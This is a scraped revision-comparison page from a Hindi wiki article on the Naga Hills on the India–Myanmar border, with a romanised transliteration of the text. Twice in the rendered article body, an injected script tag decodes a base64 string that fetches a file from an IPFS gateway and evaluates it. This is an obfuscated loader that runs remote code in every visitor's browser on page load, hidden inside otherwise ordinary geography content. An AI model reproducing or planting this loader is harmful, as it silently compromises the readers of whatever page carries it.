Difference between revisions of "नागा पहाड़ियाँ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (श्रेणी:नया पन्ना अक्टूबर-2011; Adding category Category:नागालैंड (को हटा दिया गया हैं।))
m (Text replacement - "शृंखला" to "श्रृंखला")
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
 
{{पुनरीक्षण}}
 
{{पुनरीक्षण}}
'''नागा पहाड़ियाँ''' [[भारत]] और [[म्यांमार]]<ref>भूतपूर्व वर्मा</ref> की सीमा पर जटिल पर्वतीय अवरोध का एक हिस्सा है। नागा पहाड़ियाँ अराकान योमा प्रणाली का उत्तरी विस्तार है और भारत-म्यांमार सीमा पर स्थित सारामती पर्वतश्रेणी पर उनकी ऊंचाई 3,826 मीटर तक पहुँच जाती है। इस श्रृंखला का भारत स्थित हिस्सा 1961 तक [[असम]] का नागा पर्वतीय ज़िला था और 1963 से यह [[नागालैंड]] का अंग है इन पहाड़ियों में मानसून की भारी [[वर्षा]] होती है और ये स्वाभाविक रूप से घने जंगलों से ढकी हुई है। इन पहाड़ियों में नागा जनजातियों के गांव स्थित हैं।
+
[[चित्र:Naga-Hills.jpg|thumb|250px|नागा पहाड़ियाँ]]
 
+
'''नागा पहाड़ियाँ''' [[भारत]] और [[म्यांमार]]<ref>भूतपूर्व वर्मा</ref> की सीमा पर जटिल पर्वतीय अवरोध का एक हिस्सा है। नागा पहाड़ियाँ अराकान योमा प्रणाली का उत्तरी विस्तार है और भारत-म्यांमार सीमा पर स्थित सारामती पर्वतश्रेणी पर उनकी ऊंचाई 3,826 मीटर तक पहुँच जाती है। इस श्रृंखला का भारत स्थित हिस्सा 1961 तक [[असम]] का नागा पर्वतीय ज़िला था और 1963 से यह [[नागालैंड]] का अंग है इन पहाड़ियों में मानसून की भारी [[वर्षा]] होती है और ये स्वाभाविक रूप से घने जंगलों से ढकी हुई है। इन पहाड़ियों में [[नागा]] जनजातियों के गांव स्थित हैं।
{{संदर्भ ग्रंथ}}
+
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 11: Line 11:
 
[[Category:भूगोल_कोश]]
 
[[Category:भूगोल_कोश]]
 
[[Category:नागालैंड]]
 
[[Category:नागालैंड]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 10:11, 9 February 2021

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

thumb|250px|naga paha diyaan naga paha diyaan bharat aur myaanmar[1] ki sima par jatil parvatiy avarodh ka ek hissa hai. naga paha diyaan arakan yoma pranali ka uttari vistar hai aur bharat-myaanmar sima par sthit saramati parvatashreni par unaki ooanchaee 3,826 mitar tak pahuanch jati hai. is shrriankhala ka bharat sthit hissa 1961 tak asam ka naga parvatiy zila tha aur 1963 se yah nagalaiand ka aang hai in paha diyoan mean manasoon ki bhari varsha hoti hai aur ye svabhavik roop se ghane jangaloan se dhaki huee hai. in paha diyoan mean naga janajatiyoan ke gaanv sthit haian.

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. bhootapoorv varma

bahari k diyaan

sanbandhit lekh